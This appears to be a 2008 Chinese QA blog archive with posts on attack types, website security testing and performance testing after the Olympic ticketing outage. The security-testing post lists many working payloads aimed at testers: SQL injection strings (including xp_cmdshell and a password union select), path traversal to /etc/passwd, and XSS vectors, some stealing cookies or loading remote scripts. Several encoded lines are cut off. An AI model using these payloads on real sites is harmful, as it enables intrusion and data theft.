7) Fraggle攻击:Fraggle攻击对Smurf攻击作了简单的修改,使用的是UDP应答消息,而非ICMP。
8) 电子邮件炸弹:电子邮件炸弹是最古老的匿名攻击之一,通过设置一台机器,不断大量地向同一地址发送电子邮件,攻击者能够耗尽接收者网络的带宽。
9) 畸形消息攻击:各类操作系统上的许多服务都存在此类问题,由于这些服务在处理信息之前没有进行适当正确的错误校验,在收到畸形的信息时可能会崩溃。
l 内部攻击:当系统的合法用户以非故意或非授权方式进行动作时就成为内部攻击。多数已知的计算机犯罪都和使系统安全遭受损害的内部攻击有密切的关系。能用来防止内部攻击的保护方法包括:所有管理数据流进行加密;利用包括使用强口令在内的多级控制机制和集中管理机制来加强系统的控制能力;为分布在不同场所的业务部门划分VLAN,将数据流隔离在特定部门;利用防火墙为进出网络的用户提供认证功能,提供访问控制保护;使用安全日志记录网络管理数据流等。
l 外部攻击:外部攻击可以使用的方法有:搭线(主动的与被动的)、截取辐射、冒充为系统的授权用户、冒充为系统的组成部分、为鉴别或访问控制机制设置旁路等。
l 陷阱门:当系统的实体受到改变,致使一个攻击者能对命令或对预定的事件或事件序列产生非授权的影响时,其结果就称为陷阱门。例如,口令的有效性可能被修改,使得除了其正常效力之外也使攻击者的口令生效。
l 特洛伊木马:对系统而言的特洛伊木马,是指它不但具有自己的授权功能,而且还有非授权功能。一个向非授权信道拷贝消息的中继就是一个特洛伊木马。典型的特洛伊木马有NetBus、BackOrifice和BO2k 等。
4. 侦听技术
侦听技术实际上是在数据通信或数据交互过程,对数据进行截取分析的过程。目前最为流行的是网络数据包的捕获技术,通常我们称为 Capture,黑客可以利用该项技术实现数据的盗用,而测试人员同样可以利用该项技术实现安全测试。
该项技术主要用于对网络加密的验证。
-
安全性测试系列之二-如何对网站进行安全性测试?
2008-02-15 14:45:54
DJANGO的那篇文档中只介绍了网络中常见的安全问题以及如何从程序的角度去防御它们,并未介绍如何针对安全问题进行测试.本章的主要内容是针对上章中提及的安全性问题介绍如何进行安全性测试.1.SQL Injection(SQL 注入)
(1)如何进行SQL注入测试?
- 首先找到带有参数传递的URL页面,如搜索页面,登录页面,提交评论页面等等.
注1:对于未明显标识在URL中传递参数的,可以通过查看HTML源代码中的"FORM"标签来辨别是否还有参数传递.在<FORM>和</FORM>的标签中间的每一个参数传递都有可能被利用.
<form id="form_search" action="/search/" method="get">
<div>
<input type="text" name="q" id="search_q" value="" />
<input name="search" type="image" src="/media/images/site/search_btn.gif" />
<a href="/search/" class="fl">Gamefinder</a>
</div>
</form>
注2:当你找不到有输入行为的页面时,可以尝试找一些带有某些参数的特殊的URL,如HTTP://DOMAIN/INDEX.ASP?ID=10- 其次,在URL参数或表单中加入某些特殊的SQL语句或SQL片断,如在登录页面的URL中输入HTTP://DOMAIN/INDEX.ASP?USERNAME=HI' OR 1=1--
注1:根据实际情况,SQL注入请求可以使用以下语句:
' or 1=1- -
" or 1=1- -
or 1=1- -
' or 'a'='a
" or "a"="a
') or ('a'='a
注2:为什么是OR,以及'――'是特殊的字符呢?例子:在登录时进行身份验证时,通常使用如下语句来进行验证:sql=select * from user where name='"&name&"' and pwd='"&pwd&"'
如 输入http://duck/index.asp?username=admin' or 1=1- -,SQL语句会变成以下:sql=select * from user where name='admin' or 1='1' and password='11'
OR是一个逻辑运算符,在判断多个条件的时候,只要一个成立,则等式就成立,后面的AND就不再时行判断了,也就是说我们绕过了密码验证,我们只用用户名就可以登录.
如 输入http://duck/index.asp?username=admin'--,SQL语句会变成以下sql=select * from user where name='admin' --' and pasword='11',
“--”是忽略或注释,上述通过连接符注释掉后面的密码验证(注:对ACCESS数据库无效).- 最后,验证是否能入侵成功或是出错的信息是否包含关于数据库服务器的相关信息;如果能说明存在SQL安全漏洞.
- 试想,如果网站存在SQL注入的危险,对于有经验的恶意用户还可能猜出数据库表和表结构,并对数据库表进行增\删\改的操作,这样造成的后果是非常严重的.
-
替换或删除敏感字符及字符串。
-
屏蔽出错信息:阻止攻击者知道攻击的结果
-
在服务端正式处理之前提交数据的合法性进行检查等。最根本的解决手段,在确认客户端的输入合法之前,服务端拒绝进行关键性的处理操作.
2.Cross-site scritping(XSS):(跨站点脚本攻击)
- <!--[if !supportLists]-->首先,找到带有参数传递的URL,如登录页面,搜索页面,提交评论,发表留言页面等等。
- <!--[if !supportLists]-->其次,在页面参数中输入如下语句(如:Javascrīpt,VB scrīpt, HTML,ActiveX, Flash)来进行测试:
'><scrīpt> alert('XSS')</scrīpt>
- 注:其它的XSS测试语句
最后,验证是否会出现带有“XSS”的弹出框,如果有则说明存在XSS漏洞.><scrīpt>alert(document.cookie)</scrīpt>
='><scrīpt>alert(document.cookie)</scrīpt>
<scrīpt>alert(document.cookie)</scrīpt>
<scrīpt>alert(vulnerable)</scrīpt>
%3Cscrīpt%3Ealert('XSS')%
<scrīpt>alert('XSS')</scrīpt>
<img src="javascrīpt:alert('XSS')">
%
%22%3cscrīpt%3ealert(%22xss%22)%
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%
%
%3cscrīpt%3ealert(%22xss%22)%
%
%
<scrīpt>alert('Vulnerable');</scrīpt>
<scrīpt>alert('Vulnerable')</scrīpt>
?sql_debug=
a%
a.jsp/<scrīpt>alert('Vulnerable')</scrīpt>
a/
a?<scrīpt>alert('Vulnerable')</scrīpt>
"><scrīpt>alert('Vulnerable')</scrīpt>
';exec%20master..xp_cmdshell%20'dir%
%22%3E%3Cscrīpt%3Ealert(document.cookie)%
%3Cscrīpt%3Ealert(document. domain);%
%3Cscrīpt%3Ealert(document.domain);%
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG SRC="javascrīpt:alert('XSS');">
<IMG SRC=javascrīpt:alert('XSS')>
<IMG SRC=javascrīpt:alert('XSS')>
<IMG SRC=javascrīpt:alert("XSS")>
<IMG SRC=javascrīpt:alert('XSS')>
<IMG SRC=javascrīpt:alert('XSS')>
<IMG SRC=&#x
<IMG SRC="jav ascrīpt:alert('XSS');">
<IMG SRC="jav ascrīpt:alert('XSS');">
<IMG SRC="jav ascrīpt:alert('XSS');">
"<IMG SRC=java\0scrīpt:alert(\"XSS\")>";' > out
<IMG SRC=" javascrīpt:alert('XSS');">
<scrīpt>a=/XSS/alert(a.source)</scrīpt>
<BODY BACKGROUND="javascrīpt:alert('XSS')">
<BODY ōNLOAD=alert('XSS')>
<IMG DYNSRC="javascrīpt:alert('XSS')">
<IMG LOWSRC="javascrīpt:alert('XSS')">
<BGSOUND SRC="javascrīpt:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" HREF="javascrīpt:alert('XSS');">
<IMG SRC='vbscrīpt:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescrīpt:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascrīpt:alert('XSS');">
<IFRAME SRC=javascrīpt:alert('XSS')></IFRAME>
<FRAMESET><FRAME SRC=javascrīpt:alert('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascrīpt:alert('XSS')">
<DIV STYLE="background-image: url(javascrīpt:alert('XSS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<STYLE TYPE="text/javascrīpt">alert('XSS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascrīpt:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascrīpt:alert('XSS')")}</STYLE>
<BASE HREF="javascrīpt:alert('XSS');//">
getURL("javascrīpt:alert('XSS')")
a="get";b="URL";c="javascrīpt:";d="alert('XSS');";eval(a+b+c+d);
<XML SRC="javascrīpt:alert('XSS');">
"> <BODY ōNLOAD="a();"><scrīpt>function a(){alert('XSS');}</scrīpt><"
<scrīpt SRC="/Article/UploadFiles/200608/20060827171609376.jpg"></scrīpt>
<IMG SRC="javascrīpt:alert('XSS')"
<!--#exec cmd="/bin/echo '<scrīpt SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></scrīpt>'"-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<scrīpt a=">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>
<scrīpt =">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>
<scrīpt a=">" '' SRC="http://xss.ha.ckers.org/a.js"></scrīpt>
<scrīpt "a='>'" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>
<scrīpt>document.write("<SCRI");</scrīpt>PT SRC="http://xss.ha.ckers.org/a.js"></scrīpt>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
4.Email Header Injection(邮件标头注入)
5.Directory Traversal(目录遍历)
6.exposed error messages(错误信息)
-
安全性测试系列之一-网站安全性问题
2008-02-15 14:42:09
然我的工作经验有四年,但是算是测试新手,在测试行业混也只有半年的时间,现在在一家外包公司做QA,该公司的业务都是基于B/S结构的,我的测试工作也主要是WEB测试.其实我知道的关于WEB测试的东西也是纯理论性的,除了要进行功能测试外,还要进行界面测试,兼容性测试,性能测试,安全性测试.
在项目初期我已经把安全性测试纳入到测试的计划中了,但是苦于不知道如何下手,一直也没有开展这项测试,直到有一天,我们的公司的一位程序员偶然从GOOGLE中搜索到了一个网站,这个网站报告了我们现有程序中存在着XSS漏洞.我们公司的人基本上都不了解安全性测试,出了这个事件后,安全性测试也被正式提到了测试的工作日程中.
我通过查找资料,总结了一下安全性测试的内容,内容并不完整,有待继续补充.
我们将会从三个方面来讨论安全性测试,首先是安全性问题都包括哪些?其次是如何进行安全性测试?最后是安全性测试工具.
今天主要总结安全性问题都包括哪些.
1.DJANGO的一篇文档中介绍了关于安全性问题包括的内容:
2.安全性问题包括的内容:
-
SQL Injection:(SQL注入)
SQL injection is a common exploit in which an attacker alters Web page parameters (such as GET/POST data or URLs) to insert arbitrary SQL snippets that a naive Web application executes in its database directly.
SQL注入是最常见的攻击方式,它的主要原理是:攻击者通过改变WEB页的参数(如GET/POST数据或是URLS)直接将SQL片断提交到服务器,并在服务器端执行的过程.
-
Cross-Site scrīpting (XSS):(跨站点脚本攻击)
Cross-site scrīpting (XSS), is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of <scrīpt> tags.
Attackers often use XSS attacks to steal cookie and session information, or to trick users into giving private information to the wrong person (aka phishing).
XSS定义:是由于WEB程序没有对用户提交的HTML内容进行适当的转译,这样攻击者就可能在你的WEB页中插入一些HTML语句,这些语句通过以<SCRITP>TAG的形式出现.
攻击者通常使用XSS攻击来窃取COOKIES 和 SESSION信息,或是欺骗用户将隐私信息暴露给错误对象(又称为钓鱼)
-
Cross-Site Request Forgery:(指跨站点请求伪造)
Cross-site request forgery (CSRF) happens when a malicious Web site tricks users into unknowingly loading a URL from a site at which they’re already authenticated — hence taking advantage of their authenticated status.
CSRF:通过在WEB页或在给用户发邮件中插入恶意代码(通常是链接或是脚本),比如发送一个带有银行取款链接的图片或脚本(通常是HTML或JAVAscrīpt),当用户访问这个图片时,系统会自动向目标站点发起请求,如果这个目标站点的仍保留这个用户的COOKIE信息,并且这个COOKIER未过期,那么攻击者就可以在用户不知情的情况以用户的身份登录银行或执行取款操作.CSRF的特性就是利用网站对用户标识的信任,欺骗用户的浏览器发送HTTP请求给目标站点
-
Session Forging/Hijacking:(Session 篡改)
-
Email Header Injection:(邮件标题注入)
SQL injection’s less well-known sibling,email header injection, hijacks Web forms that send email. An attacker can use this technique to send spam via your mail server. Any form that constructs email headers from Web form data is vulnerable to this kind of attack.
email header injection 与 SQL注入的原理类似,它的原理是:通过在EMAIL的SUBJECT中输入一些特殊语句如"\n",攻者者可以利用这个缺陷通过你的邮件服务器发送垃圾邮件.-
Directory Traversal:(目录遍历)
Directory traversal is another injection-style attack, wherein a malicious user tricks filesystem code into reading and/or writing files that the Web server shouldn’t have access to.
目录遍历是另一种注入类型的攻击,攻击者欺骗文件系统读或写服务器不允许操作的文件.-
Exposed Error Messages:(曝露错误信息)
During development, being able to see tracebacks and errors live in your browser is extremely useful.However, if these errors get displayed once the site goes live, they can reveal aspects of your code or configuration that could aid an attacker.
开发过程中,如果可以看到错误或历史记录对FIX问题是非常有用的.但是如果这些错误信息被攻击者所获取,那么攻击者就可以通过错误信息而了解到应用程序代码或是数据库或是配置等方面的内容,并为期其行攻击提供有力的帮助. -
-
从奥运订票网站的瘫痪漫谈性能测试
2008-02-15 11:48:08
我们知道性能测试是对整个架构来说的。
而架构包括两个方面,即:软件和硬件。
硬件又包括很多内容,列举如:主板、硬盘、内存、CPU、路由器、交换机、防火墙等等。
软件也包括很多方面,列举如:OS、application server、application、database、middleware,etc。
做性能测试,这些方面都是要考虑到的。才能对整体有很好的把握。性能测试做的才最有实质意义(此实质意义从技术角度来说)。
奥运订票网站的瘫痪,显然是大数据量的提交造成的。我们不用怀疑它功能上的实现。如果功能不能实现肯定不会上线的了。在上线之前他们肯定也是做了性能测试的。我们也不用怀疑他们的性能测试的有效性。
提交用户的多少对性能的影响并不是二元一次的直线方程上升的。
我想在这一性能测试的过程中,任何一个环节的疏忽都有可能引起此结果。
第一,性能测试工程师的素质,必须严格要求。
所以我们在做性能测试的过程中,一定要充分把握这些环节。同时引入另一个问题:谁能把握得了这么多环节?纵然一个拥有十几年工作经验的人来说,也不能保证在性能测试中可以把握每一个具体的细节。更何况人的知识体系都是有限的。所以,在做性能测试时,我们尽量把每个问题都细化。然后找相关的技术人员,即使做性能测试的人,对网络、数据库等都非常了解。也尽量把大家召到一起,共商性能问题。这样可以减少一些一个人容易疏忽的问题。经常听到有些公司让一些没有很长时间工作经验的人去做性能测试,还有些初学者去做。这些都无非是做做幌子给客户看看,说明我们公司有这样的职位存在。但是他们的作用何在?如何体现出来?怎么衡量?这是个很重要的问题。这些应该属于性能测试度量范畴。
我为这种形同虚设的职位感觉很不值。同时也为某些公司对性能测试这一职位的态度,很痛心。如果希望在这一职位的人把这一职责做好,就应该去找有相应技能的人。而不应该把它当成拿给客户看的幌子。
当然,这里还要肯定一些性能测试工程师存在的不容忽视的价值。为一些项目的潜在问题做出了很重要的性能测试,从而避免了庞大的损失。
我必须强调,性能测试工程师的技术深度,对性能测试的效果起着非常非常重要的作用。
第二,团队的重要性也不容忽视。
在社会中生存无疑要接触人,在一个项目中,我们也在接触着自己的同事。团队的氛围我觉得可以直接影响工作的效率和效果。针对一些公司中开发和测试扯皮的事实,我觉得完全没有必要。从目标上来说,一个团队的目标只有一个:做出最好的产品。但是,存在责任推卸的最大问题,我觉得在于:岗位职责不明确。这一问题导致很多性能测试人员,感觉自己一直在打杂。可能很多其他测试人员也有此感觉。这一点,可能是由于测试行业是近几年才飞速发展起来的原因。其实这是一个应该切忌浮躁的行业。技术行业,应该是踏实而沉稳的。并不像一些广告中吹嘘的那么高深和前途无量。接着说团队,职责划分明确是非常重要的。接着还有计划的合理性,很多公司的计划都存在着严重的问题。有时是因为项目时间不够,
有时是因为工作量的判断不足,等等。有时听人说存在这样的事情:测试人员需要测试当天开发人员写出来的代码。这样的话,上班时间,测试人员,没什么事做。而下班了就一直需要加班。这只是时间的不合理。其他的资源安排不合理的事件,也不一一例举了。
这里强调的是:团队氛围良好、职责明确和资源的合理安排。
第三,软件应用系统的架构。
这一问题直接影响整个系统的性能,如果系统架构先天不良,系统根本用不着测试。这一点在前期的需求中肯定有明确描述。并于这一问题,并不是性能测试人员能够解决的。但是,是性能测试人员必须关注的。一个成熟的架构,是我们应该考虑的。但是性能问题,也有可能出在架构上。做性能测试时需要注意。
其他技术因素不再一一列举,以上是技术角度来说明性能测试。
其他因素对性能测试的影响
第一, 用户需求。
我觉得用户需求对性能测试的影响很大。因为做性能测试就是为了给用户看。有时客户会要求流程应该如何去走。这样的流程可能对客户来说是最好的。功能的实现也丝毫没有问题。但是性能就会完全不一样了。当所有用户都蜂拥而至,我们最应该考虑的是什么?系统不要瘫痪。宁愿慢,也不要瘫痪。但是流程影响着性能,如果按客户所要求的流程达不到客户的性能需求,应该采用其他手段来平衡性能问题的时候,不要犹豫。性能测试工程师们大胆的提出自己的建议。当然,需要足够的论证。
第二,领导们。
我觉得很多时候领导一句话的决策就影响着最终的结局。类似于:大领导拍脑袋,中领导拍胸脯,干活的拍屁股。
也是没有办法呀。我在外做过一个项目,那个项目的领导就很理智。他让我来做性能测试。他会和开发和测试一起商量如果制定策略。如果出了性能问题,责任划分也很明确。立即就改。但是,有些领导的要求也确实无理了点。这样的现象导致下面的测试没有办法做。
这一点是我们没有办法的,只能提建议上去了。
其他外界因素,这里不再描述。
早上听到有人说奥运订票网站瘫痪,从一个技术人员的角度来想,还是比较惊讶的。难道是性能测试没有做好?没有重视性能测试的原因?或者是做了,并没有模拟出实际的那么多用户量的数据量?在我平时做的性能测试中,如果我对某模块做了性能测试,达到了多少用户。我会充分分析性能测试的有效性。从而在写报告的时候,更深入的分析问题。如果奥运订票网站任一环节都在可控的范围内,出现这样的问题,就可以说是纯意外了。
只是我觉得并不是纯意外。
希望做性能测试的人,不要舍本逐末。
我的栏目
标题搜索
我的存档
数据统计
- 访问量: 30540
- 日志数: 40
- 建立时间: 2008-02-15
- 更新时间: 2014-04-18
